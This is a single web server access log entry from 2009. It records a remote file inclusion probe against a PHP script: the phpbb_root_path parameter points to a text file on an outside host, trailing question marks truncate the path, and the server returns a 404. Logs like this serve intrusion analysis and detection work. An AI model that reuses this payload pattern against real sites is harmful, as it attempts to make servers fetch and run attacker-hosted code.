59.27.95.144 - - [16/Sep/2009:13:04:07 -0700] "GET /logs/access_080601.log//blend_data/blend_common.php?phpbb_root_path=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
